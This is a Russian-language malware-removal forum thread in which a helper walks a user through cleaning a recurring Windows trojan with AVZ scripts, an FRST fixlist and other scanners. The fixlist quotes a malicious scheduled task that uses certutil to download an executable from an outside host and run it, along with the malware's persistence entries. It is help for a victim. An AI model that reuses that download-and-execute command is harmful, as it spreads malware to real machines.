Страница 1 из 2 12 Последняя
Показано с 1 по 20 из 22.

Карантин 534EFA07237CC26729525E9E0DE99B31 [Trojan.Win32.KillAV.rjy, Trojan.Win32.Agentb.jbkv, HEUR:Trojan.Win32.Generic ] (заявка № 219436)

  1. #1
    Junior Member Репутация
    Регистрация
    25.06.2018
    Сообщений
    10
    Вес репутации
    27

    Карантин 534EFA07237CC26729525E9E0DE99B31 [Trojan.Win32.KillAV.rjy, Trojan.Win32.Agentb.jbkv, HEUR:Trojan.Win32.Generic ]

    Здравствуйте! Помогите избавиться от вируса. Удалял я его много раз, в т.ч. с помощью перезагрузки с диска Kaspersky Rescue Disk. Однако через короткое время он снова появляется.
    Вложения Вложения

  2. Будь в курсе!
    Реклама на VirusInfo

    Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:

    Anti-Malware Telegram
     

  3. #2
    Cyber Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для Info_bot
    Регистрация
    11.05.2011
    Сообщений
    2,289
    Вес репутации
    384
    Уважаемый(ая) Demonic Tutor, спасибо за обращение на наш форум!

    Помощь при заражении комьютера на VirusInfo.Info оказывается абсолютно бесплатно. Хелперы, в самое ближайшее время, ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитой Autologger, подробнее можно прочитать в правилах оформления запроса о помощи.

    information

    Информация

    Если вы хотите получить персональную гарантированную помощь в приоритетном режиме, то воспользуйтесь платным сервисом Помогите+.





    Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста поддержите проект.

  4. #3
    Невымерший Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для thyrex
    Регистрация
    07.03.2009
    Адрес
    Soligorsk, Belarus
    Сообщений
    99,211
    Вес репутации
    3109
    Выполните скрипт в AVZ
    Код:
    begin
    ShowMessage('Внимание! Перед выполнением скрипта AVZ автоматически закроет все сетевые подключения.' + #13#10 + 'После перезагрузки компьютера подключения к сети будут восстановлены в автоматическом режиме.');
    ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true);
    if not IsWOW64
     then
      begin
       SearchRootkit(true, true);
       SetAVZGuardStatus(True);
      end;
     DeleteService('Winmon');
     DeleteService('WinmonProcessMonitor');
     DeleteService('WinmonFS');
     QuarantineFile('C:\Users\USER\AppData\Local\Temp\csrss\scheduled.exe','');
     QuarantineFile('C:\Windows\System32\drivers\WinmonFS.sys','');
     QuarantineFile('C:\Windows\System32\drivers\WinmonProcessMonitor.sys','');
     SetServiceStart('WinDefender', 4);
     DeleteService('WinDefender');
     TerminateProcessByName('c:\windows\windefender.exe');
     QuarantineFile('c:\windows\windefender.exe','');
     TerminateProcessByName('c:\users\user\appdata\local\temp\csrss\mrt.exe');
     QuarantineFile('c:\users\user\appdata\local\temp\csrss\mrt.exe','');
     TerminateProcessByName('c:\windows\rss\csrss.exe');
     QuarantineFile('c:\windows\rss\csrss.exe','');
     TerminateProcessByName('c:\users\user\appdata\roaming\epicnet inc\cloudnet\cloudnet.exe');
     QuarantineFile('c:\users\user\appdata\roaming\epicnet inc\cloudnet\cloudnet.exe','');
     DeleteFile('c:\users\user\appdata\roaming\epicnet inc\cloudnet\cloudnet.exe','32');
     DeleteFile('c:\windows\rss\csrss.exe','32');
     DeleteFile('c:\users\user\appdata\local\temp\csrss\mrt.exe','32');
     DeleteFile('c:\windows\windefender.exe','32');
     RegKeyParamDel('HKEY_CURRENT_USER','Software\Microsoft\Windows\CurrentVersion\Run','CrimsonThunder');
     RegKeyParamDel('HKEY_CURRENT_USER','Software\Microsoft\Windows\CurrentVersion\Run','CloudNet');
     DeleteFile('C:\Windows\system32\Tasks\csrss','32');
     DeleteFile('C:\Windows\Tasks\RegTask.job','32');
     DeleteFile('C:\Windows\system32\Tasks\MRT','32');
     DeleteFile('C:\Windows\system32\Tasks\RegTask','32');
     DeleteFile('C:\Windows\system32\Tasks\ReimageUpdater','32');
     DeleteFile('C:\Windows\system32\Tasks\ScheduledUpdate','32');
     DeleteFile('C:\Users\USER\AppData\Local\Temp\csrss\scheduled.exe','32');
     DeleteFile('C:\Windows\System32\drivers\Winmon.sys','32');
     DeleteFile('C:\Windows\System32\drivers\WinmonFS.sys','32');
     DeleteFile('C:\Windows\System32\drivers\WinmonProcessMonitor.sys','32');
    BC_ImportAll;
    ExecuteSysClean;
    BC_Activate;
    RebootWindows(false);
    end.
    • Обратите внимание: будет выполнена перезагрузка компьютера.


    Выполните скрипт в AVZ
    Код:
    begin
    CreateQurantineArchive('c:\quarantine.zip');
    end.
    c:\quarantine.zip пришлите по красной ссылке Прислать запрошенный карантин над первым сообщением темы.

    Пожалуйста, ЕЩЕ РАЗ запустите Autologger, прикрепите к следующему сообщению НОВЫЕ логи.
    Microsoft MVP 2012-2016 Consumer Security
    Microsoft MVP 2016 Reconnect

  5. #4
    Junior Member Репутация
    Регистрация
    25.06.2018
    Сообщений
    10
    Вес репутации
    27
    Новые логи
    Вложения Вложения

  6. #5
    Невымерший Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для thyrex
    Регистрация
    07.03.2009
    Адрес
    Soligorsk, Belarus
    Сообщений
    99,211
    Вес репутации
    3109
    Скачайте Farbar Recovery Scan Tool и сохраните на Рабочем столе.
    • Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.


    1. Запустите программу двойным щелчком. Когда программа запустится, нажмите Yes для соглашения с предупреждением.
    2. Убедитесь, что в окне Optional Scan отмечены List BCD, Driver MD5 и 90 Days Files.

    3. Нажмите кнопку Scan.
    4. После окончания сканирования будет создан отчет (FRST.txt) в той же папке, откуда была запущена программа.
    5. Если программа была запущена в первый раз, также будет создан отчет (Addition.txt).
    6. Отчеты, полученные в пунктах 4 и 5, заархивируйте (в один архив) и прикрепите к сообщению.
    Microsoft MVP 2012-2016 Consumer Security
    Microsoft MVP 2016 Reconnect

  7. #6
    Junior Member Репутация
    Регистрация
    25.06.2018
    Сообщений
    10
    Вес репутации
    27
    Пожалуйста.
    Вложения Вложения
    • Тип файла: rar frst.rar (22.3 Кб, 5 просмотров)

  8. #7
    Невымерший Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для thyrex
    Регистрация
    07.03.2009
    Адрес
    Soligorsk, Belarus
    Сообщений
    99,211
    Вес репутации
    3109
    1. Откройте Блокнот и скопируйте в него приведенный ниже текст
    Код:
    CreateRestorePoint:
    HKU\S-1-5-21-2191775230-1462904218-4196743852-1000\...\Run: [CrimsonThunder] => C:\Windows\rss\csrss.exe [3158016 2018-06-26] () <==== ATTENTION
    HKU\S-1-5-21-2191775230-1462904218-4196743852-1000\...\Run: [CloudNet] => C:\Users\USER\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe [683008 2018-06-26] (EpicNet Inc.) <==== ATTENTION
    HKU\S-1-5-21-2191775230-1462904218-4196743852-1000\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://webalta.ru/search
    HKU\S-1-5-21-2191775230-1462904218-4196743852-1000\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://webalta.ru/search
    Toolbar: HKLM - No Name - {D4027C7F-154A-4066-A1AD-4243D8127440} -  No File
    C:\Users\USER\AppData\Local\Google\Chrome\User Data\Default\Extensions\aaaaphcodaeekobnmpkdljikkcogmgmb
    CHR HKLM\...\Chrome\Extension: [aaaaphcodaeekobnmpkdljikkcogmgmb] - C:\Users\USER\AppData\Local\APN\GoogleCRXs\aaaaphcodaeekobnmpkdljikkcogmgmb_7.15.4.0.crx [2012-08-07]
    R2 WinDefender; C:\Windows\windefender.exe [0 ] () <==== ATTENTION (zero byte File/Folder)
    R3 Winmon; C:\Windows\System32\drivers\Winmon.sys [0 ] () <==== ATTENTION (zero byte File/Folder)
    R3 WinmonFS; C:\Windows\System32\drivers\WinmonFS.sys [0 ] (Windows (R) Win 7 DDK provider) <==== ATTENTION (zero byte File/Folder)
    R1 WinmonProcessMonitor; C:\Windows\System32\drivers\WinmonProcessMonitor.sys [28368 2018-06-26] () [File not signed] <==== ATTENTION
    2018-06-26 12:04 - 2018-06-26 12:04 - 000028368 _____ C:\Windows\system32\Drivers\WinmonProcessMonitor.sys
    2018-06-22 12:24 - 2018-06-22 12:24 - 000000000 ____D C:\Users\USER\AppData\Roaming\EpicNet Inc
    Task: {18478172-FA22-498B-AF02-38D83AED5BDB} - no filepath
    Task: {885C87AA-D031-4A47-B20F-63E3B42BFE8E} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f hxxp://newscommer.com/app/app.exe C:\Users\USER\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\USER\AppData\Local\Temp\csrss\scheduled.exe /31340 <==== ATTENTION
    Task: {8A34A695-6DC7-4F5B-85E2-690E19C777A8} - \Scheduled Update for Ask Toolbar -> No File <==== ATTENTION
    Task: {A4339261-C9AA-4B32-9AC1-FC93969185FA} - System32\Tasks\csrss => C:\Windows\rss\csrss.exe [2018-06-26] () <==== ATTENTION
    Task: {D3F6F725-37E8-42EB-A58A-18D80273C481} - \ReimageUpdater -> No File <==== ATTENTION
    Task: {D8783B67-BCB5-4403-AB4C-95B5AC7E4D3C} - System32\Tasks\MRT => C:\Users\USER\AppData\Local\Temp\csrss\mrt.exe [2018-06-26] () <==== ATTENTION
    C:\Users\USER\AppData\Local\Temp\csrss
    AlternateDataStreams: C:\ProgramData\TEMP:AF4CCAAD [111]
    AlternateDataStreams: C:\Users\USER\Local Settings:wa [146]
    AlternateDataStreams: C:\Users\USER\AppData\Local:wa [146]
    AlternateDataStreams: C:\Users\USER\AppData\Local\Application Data:wa [146]
    AlternateDataStreams: C:\Users\Все пользователи\TEMP:AF4CCAAD [111]
    HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\05583667.sys => ""="Driver"
    HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\19953295.sys => ""="Driver"
    HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\20453980.sys => ""="Driver"
    HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\22212048.sys => ""="Driver"
    HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\23813818.sys => ""="Driver"
    HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\24258072.sys => ""="Driver"
    HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\25757988.sys => ""="Driver"
    HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\31280338.sys => ""="Driver"
    HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\32944514.sys => ""="Driver"
    HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\40887225.sys => ""="Driver"
    HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\44342232.sys => ""="Driver"
    HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\50273139.sys => ""="Driver"
    HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\59496168.sys => ""="Driver"
    HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\7B3CA26D.sys => ""="Driver"
    HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\7B3CA26D61.sys => ""="Driver"
    HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\80226886.sys => ""="Driver"
    HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\81834799.sys => ""="Driver"
    HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\84466124.sys => ""="Driver"
    HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\89798466.sys => ""="Driver"
    HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\99105427.sys => ""="Driver"
    HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\05583667.sys => ""="Driver"
    HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\19953295.sys => ""="Driver"
    HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\20453980.sys => ""="Driver"
    HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\22212048.sys => ""="Driver"
    HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\23813818.sys => ""="Driver"
    HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\24258072.sys => ""="Driver"
    HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\25757988.sys => ""="Driver"
    HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\31280338.sys => ""="Driver"
    HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\32944514.sys => ""="Driver"
    HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\40887225.sys => ""="Driver"
    HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\44342232.sys => ""="Driver"
    HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\50273139.sys => ""="Driver"
    HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\59496168.sys => ""="Driver"
    HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\7B3CA26D.sys => ""="Driver"
    HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\7B3CA26D61.sys => ""="Driver"
    HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\80226886.sys => ""="Driver"
    HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\81834799.sys => ""="Driver"
    HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\84466124.sys => ""="Driver"
    HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\89798466.sys => ""="Driver"
    HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\99105427.sys => ""="Driver"
    FirewallRules: [{750341F7-DD77-4C8E-B18D-2AC529703F33}] => (Allow) C:\Windows\rss\csrss.exe
    FirewallRules: [{AB3EB9C9-A00E-4007-A1A5-B4F2F518421F}] => (Allow) C:\Windows\rss\csrss.exe
    FirewallRules: [{1188DB34-1547-4A13-90B9-5AE67A6E53B9}] => (Allow) C:\Windows\rss\csrss.exe
    FirewallRules: [{247219A1-FCBF-48EC-AE51-B9C2D81A88C4}] => (Allow) C:\Windows\rss\csrss.exe
    FirewallRules: [{C39A9424-5D7F-40C1-9BE5-5D78926564B5}] => (Allow) C:\Windows\rss\csrss.exe
    FirewallRules: [{10C1BB8A-5BCA-47D4-91F4-1A9FA4065F30}] => (Allow) C:\Windows\rss\csrss.exe
    FirewallRules: [{C7CD461F-B605-4C27-8534-F5949705A044}] => (Allow) C:\Windows\rss\csrss.exe
    FirewallRules: [{0441BB55-B9A6-4787-8B07-EC61D2D7595D}] => (Allow) C:\Windows\rss\csrss.exe
    FirewallRules: [{3E580E54-4DCD-4EA5-AAE0-27EDD4322584}] => (Allow) C:\Windows\rss\csrss.exe
    FirewallRules: [{30C476BA-C8B0-4DFE-B56C-91D85DD96380}] => (Allow) C:\Windows\rss\csrss.exe
    FirewallRules: [{1FEA185D-1CE0-4B0B-BDB4-34A6A40568F9}] => (Allow) C:\Windows\rss\csrss.exe
    FirewallRules: [{EDF00315-2ADF-414E-AE32-18F4EF02495B}] => (Allow) C:\Windows\rss\csrss.exe
    FirewallRules: [{4A57745C-48B8-4DBB-8BD9-70030499AFDB}] => (Allow) C:\Windows\rss\csrss.exe
    FirewallRules: [{C2205935-CEF3-4FFD-8E0E-C8CD6447DC5B}] => (Allow) C:\Windows\rss\csrss.exe
    FirewallRules: [{4B2F17F4-DA3E-44E8-97DC-F6EEAE965746}] => (Allow) C:\Windows\rss\csrss.exe
    FirewallRules: [{00749DE9-AD0C-4656-9262-E052D0F2ECDD}] => (Allow) C:\Windows\rss\csrss.exe
    FirewallRules: [{5A8100A8-8825-4F20-BBB9-C309DA88E67A}] => (Allow) C:\Windows\rss\csrss.exe
    FirewallRules: [{CFDA3BF3-AA3B-4354-A44E-0166ABBEE5E1}] => (Allow) C:\Windows\rss\csrss.exe
    FirewallRules: [{403C59CF-549C-46FE-8986-44773FD2770D}] => (Allow) C:\Windows\rss\csrss.exe
    FirewallRules: [{D9DBE9F9-946B-46AC-A09D-A6D7FFD765EF}] => (Allow) C:\Windows\rss\csrss.exe
    FirewallRules: [{D059CA85-1EC4-4D12-97E9-A6446E023451}] => (Allow) C:\Windows\rss\csrss.exe
    FirewallRules: [{0387F5E4-698D-42C3-B329-F9128483CA5F}] => (Allow) C:\Windows\rss\csrss.exe
    FirewallRules: [{62ACE4FC-F756-420B-A363-DF65E477EF9E}] => (Allow) C:\Windows\rss\csrss.exe
    FirewallRules: [{6F7EE220-372B-43AD-A2CA-4CB32FE626F9}] => (Allow) C:\Windows\rss\csrss.exe
    FirewallRules: [{97EE814E-C652-41C5-A683-8741DDA19EB7}] => (Allow) C:\Windows\rss\csrss.exe
    FirewallRules: [{27C1A2C3-C788-4D43-8786-57C3E2D4B97D}] => (Allow) C:\Windows\rss\csrss.exe
    FirewallRules: [{B14C472B-F4AA-477D-9113-B4335ECA0E5B}] => (Allow) C:\Windows\rss\csrss.exe
    FirewallRules: [{EFD7FCA3-DF39-4B79-AE7E-C3313C118AF9}] => (Allow) C:\Windows\rss\csrss.exe
    FirewallRules: [{BFF45D60-D903-40EF-933F-2A220B44D6F8}] => (Allow) C:\Windows\rss\csrss.exe
    FirewallRules: [{4967E8F8-E855-4F43-9633-AD895C141A9F}] => (Allow) C:\Windows\rss\csrss.exe
    FirewallRules: [{53B8A795-6D1A-432B-8131-CB7799B8EE44}] => (Allow) C:\Windows\rss\csrss.exe
    FirewallRules: [{28865E0E-1C3E-4BB4-8671-A756A5F63B28}] => (Allow) C:\Windows\rss\csrss.exe
    FirewallRules: [{A7823EFD-4853-4489-B470-85A7D405EEF4}] => (Allow) C:\Windows\rss\csrss.exe
    FirewallRules: [{1B88AFEC-D154-4D91-A343-0FAE98E02E9C}] => (Allow) C:\Windows\rss\csrss.exe
    FirewallRules: [{D01BE02B-E643-4DA8-94FC-9A6FCC65E316}] => (Allow) C:\Windows\rss\csrss.exe
    FirewallRules: [{3AE3BE43-8EA7-474F-A687-5E4EF3EEDDAC}] => (Allow) C:\Windows\rss\csrss.exe
    FirewallRules: [{93EE460B-3803-4716-8270-C46A5F37318D}] => (Allow) C:\Windows\rss\csrss.exe
    FirewallRules: [{BF09547A-DE5B-441C-BCED-57F379428297}] => (Allow) C:\Windows\rss\csrss.exe
    FirewallRules: [{6C29BB3B-9C48-4B4A-B225-49487C93B95A}] => (Allow) C:\Windows\rss\csrss.exe
    FirewallRules: [{B2CF3FA3-F208-474F-A36B-630702294696}] => (Allow) C:\Windows\rss\csrss.exe
    FirewallRules: [{6B301E7E-AD53-45EB-B042-146207193AF9}] => (Allow) C:\Windows\rss\csrss.exe
    FirewallRules: [{8EF82027-8E47-42CC-89CB-F4A59CF1EE0E}] => (Allow) C:\Windows\rss\csrss.exe
    FirewallRules: [{3B241607-DF4B-4973-8D1C-F46FF426200C}] => (Allow) C:\Windows\rss\csrss.exe
    FirewallRules: [{C29ADA70-EEA7-4FDA-8641-F70029E23DBD}] => (Allow) C:\Windows\rss\csrss.exe
    FirewallRules: [{62614864-F295-492B-992D-D6143673509D}] => (Allow) C:\Windows\rss\csrss.exe
    FirewallRules: [{48A1B2C9-2324-488A-9EC7-DA9E776B1905}] => (Allow) C:\Windows\rss\csrss.exe
    FirewallRules: [{AC4D1474-12AF-4632-B972-0C888AC6C559}] => (Allow) C:\Windows\rss\csrss.exe
    FirewallRules: [{8F278127-89DF-49AE-8213-42A09312688B}] => (Allow) C:\Users\USER\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe
    FirewallRules: [{AC2102D1-E3A6-403C-8DCA-651CEED9E4DE}] => (Allow) C:\Windows\rss\csrss.exe
    FirewallRules: [{D8494B26-A745-445C-BE02-1290F47FAF29}] => (Allow) C:\Users\USER\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe
    FirewallRules: [{7B5AB93C-C63E-4101-A3A6-4E35360E1CD5}] => (Allow) C:\Windows\rss\csrss.exe
    FirewallRules: [{0C54DDB1-0C08-4479-9D2B-596B36A08BB5}] => (Allow) C:\Users\USER\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe
    FirewallRules: [{57281BA0-0A46-423F-966B-74CFE6BF5A49}] => (Allow) C:\Windows\rss\csrss.exe
    FirewallRules: [{E41A8B0F-AF18-42DB-A7E0-E0284697E5D8}] => (Allow) C:\Users\USER\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe
    Reboot:
    2. Нажмите ФайлСохранить как
    3. Выберите папку, откуда была запущена утилита Farbar Recovery Scan Tool
    4. Укажите Тип файлаВсе файлы (*.*)
    5. Введите имя файла fixlist.txt и нажмите кнопку Сохранить
    6. Запустите FRST, нажмите один раз на кнопку Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении.
    • Обратите внимание: будет выполнена перезагрузка компьютера.
    Microsoft MVP 2012-2016 Consumer Security
    Microsoft MVP 2016 Reconnect

  9. #8
    Junior Member Репутация
    Регистрация
    25.06.2018
    Сообщений
    10
    Вес репутации
    27
    Пожалуйста. Только перезагрузки не было.

    - - - - -Добавлено - - - - -

    Я так понимаю, что вирус вмешался в работу программы, возможно. Вот файл созданный, как необходимо надеюсь( с перезагрузкой).
    Вложения Вложения

  10. #9
    Невымерший Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для thyrex
    Регистрация
    07.03.2009
    Адрес
    Soligorsk, Belarus
    Сообщений
    99,211
    Вес репутации
    3109
    Сделайте лог МВАМ
    Microsoft MVP 2012-2016 Consumer Security
    Microsoft MVP 2016 Reconnect

  11. #10
    Junior Member Репутация
    Регистрация
    25.06.2018
    Сообщений
    10
    Вес репутации
    27
    лог МВАМ
    Вложения Вложения

  12. #11
    Невымерший Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для thyrex
    Регистрация
    07.03.2009
    Адрес
    Soligorsk, Belarus
    Сообщений
    99,211
    Вес репутации
    3109
    Удалите в МВАМ все найденное
    Microsoft MVP 2012-2016 Consumer Security
    Microsoft MVP 2016 Reconnect

  13. #12
    Junior Member Репутация
    Регистрация
    25.06.2018
    Сообщений
    10
    Вес репутации
    27
    Все удалил. Однако до конца не вылечился, т.к. установив ознакомительную версию МВАМ, постоянно получаю уведомления об атаках, типа
    Trojan.MalPack 28.06.18 8:42 Файл C:\Users\User\AppData\Local\Temp\939635975\app.exe .
    За день пришло около 10 такого рода предупреждений от МВАМ.

  14. #13
    Невымерший Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для thyrex
    Регистрация
    07.03.2009
    Адрес
    Soligorsk, Belarus
    Сообщений
    99,211
    Вес репутации
    3109
    Сделайте лог TDSSkiller
    Microsoft MVP 2012-2016 Consumer Security
    Microsoft MVP 2016 Reconnect

  15. #14
    Junior Member Репутация
    Регистрация
    25.06.2018
    Сообщений
    10
    Вес репутации
    27
    Проверка TDSSkiller угроз не обнаружила, в т.ч. со всеми параметрами проверки.

  16. #15
    Невымерший Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для thyrex
    Регистрация
    07.03.2009
    Адрес
    Soligorsk, Belarus
    Сообщений
    99,211
    Вес репутации
    3109
    Вы лог прикрепите к сообщению. Найти его можно на диске С
    Microsoft MVP 2012-2016 Consumer Security
    Microsoft MVP 2016 Reconnect

  17. #16
    Junior Member Репутация
    Регистрация
    25.06.2018
    Сообщений
    10
    Вес репутации
    27
    Пожалуйста.
    Вложения Вложения

  18. #17
    Невымерший Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для thyrex
    Регистрация
    07.03.2009
    Адрес
    Soligorsk, Belarus
    Сообщений
    99,211
    Вес репутации
    3109
    Тогда запускаем тяжелую артиллерию.

    Скачайте ComboFix здесь и сохраните на Рабочий стол.

    1. Внимание! Обязательно закройте все браузеры, временно выключите антивирус, firewall и другое защитное программное обеспечение. Не запускайте других программ во время работы Combofix. Combofix может отключить интернет через некоторое время после запуска, не переподключайте интернет, пока Combofix не завершит работу. Если интернет не появился после окончания работы Combofix, перезагрузите компьютер. Во время работы Combofix не нажимайте кнопки мыши, это может стать причиной зависания Combofix.
    2. Запустите combofix.exe, когда процесс завершится, файл C:\ComboFix.txt прикрепите к сообщению.
    Примечание: В случае, если ComboFix не запускается, переименуйте combofix.exe в [email protected]
    Microsoft MVP 2012-2016 Consumer Security
    Microsoft MVP 2016 Reconnect

  19. #18
    Junior Member Репутация
    Регистрация
    25.06.2018
    Сообщений
    10
    Вес репутации
    27
    Пожалуйста.
    Вложения Вложения

  20. #19
    Невымерший Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для thyrex
    Регистрация
    07.03.2009
    Адрес
    Soligorsk, Belarus
    Сообщений
    99,211
    Вес репутации
    3109
    Папку c:\windows\rss удалите вручную (она скрытая)

    Что с проблемой?
    Microsoft MVP 2012-2016 Consumer Security
    Microsoft MVP 2016 Reconnect

  21. #20
    Junior Member Репутация
    Регистрация
    25.06.2018
    Сообщений
    10
    Вес репутации
    27
    Вот уже 3 часа спокойно. Надеюсь, это победа! Большое спасибо!

  • Уважаемый(ая) Demonic Tutor, наши специалисты оказали Вам всю возможную помощь по вашему обращению.

    В целях поддержания безопасности вашего компьютера настоятельно рекомендуем:

     

     

    Чтобы всегда быть в курсе актуальных угроз в области информационной безопасности и сохранять свой компьютер защищенным, рекомендуем следить за последними новостями ИТ-сферы портала Anti-Malware.ru:

     

     

    Anti-Malware VK

     

    Anti-Malware Telegram

     

     

    Надеемся больше никогда не увидеть ваш компьютер зараженным!

     

    Если Вас не затруднит, пополните пожалуйста нашу базу безопасных файлов.

  • Страница 1 из 2 12 Последняя

    Похожие темы

    1. Карантин 534EFA07237CC26729525E9E0DE99B31 [Trojan.Win32.KillAV.rjy, Backdoor.Win32.Agent.mytfip]
      От CyberHelper в разделе VirusDetector - Бесплатный онлайн-сервис проверки компьютера
      Ответов: 1
      Последнее сообщение: 25.06.2018, 08:26
    2. Карантин 90338ED47FA64B6E992253EF2B4AA33F [Trojan.Win32.Stantinko.a]
      От CyberHelper в разделе VirusDetector - Бесплатный онлайн-сервис проверки компьютера
      Ответов: 2
      Последнее сообщение: 25.05.2018, 12:14
    3. Карантин 9810DAA25EDF2586255DA9D2B6EA38E3 [UDS:DangerousObject.Multi.Generic]
      От CyberHelper в разделе VirusDetector - Бесплатный онлайн-сервис проверки компьютера
      Ответов: 2
      Последнее сообщение: 26.12.2015, 05:07
    4. Карантин BD2F5F5D1EE7490E4F0BE99BCC4CD279 [UDS:DangerousObject.Multi.Generic]
      От CyberHelper в разделе VirusDetector - Бесплатный онлайн-сервис проверки компьютера
      Ответов: 2
      Последнее сообщение: 26.05.2015, 04:05
    5. Карантин 8C47919F5ED8C28632D0590395638533 [UDS:DangerousObject.Multi.Generic, Trojan.Win32.Cutwail.vkk]
      От CyberHelper в разделе VirusDetector - Бесплатный онлайн-сервис проверки компьютера
      Ответов: 1
      Последнее сообщение: 29.04.2015, 11:36

    Свернуть/Развернуть Ваши права в разделе

    • Вы не можете создавать новые темы
    • Вы не можете отвечать в темах
    • Вы не можете прикреплять вложения
    • Вы не можете редактировать свои сообщения
    •  
    Page generated in 0.01058 seconds with 19 queries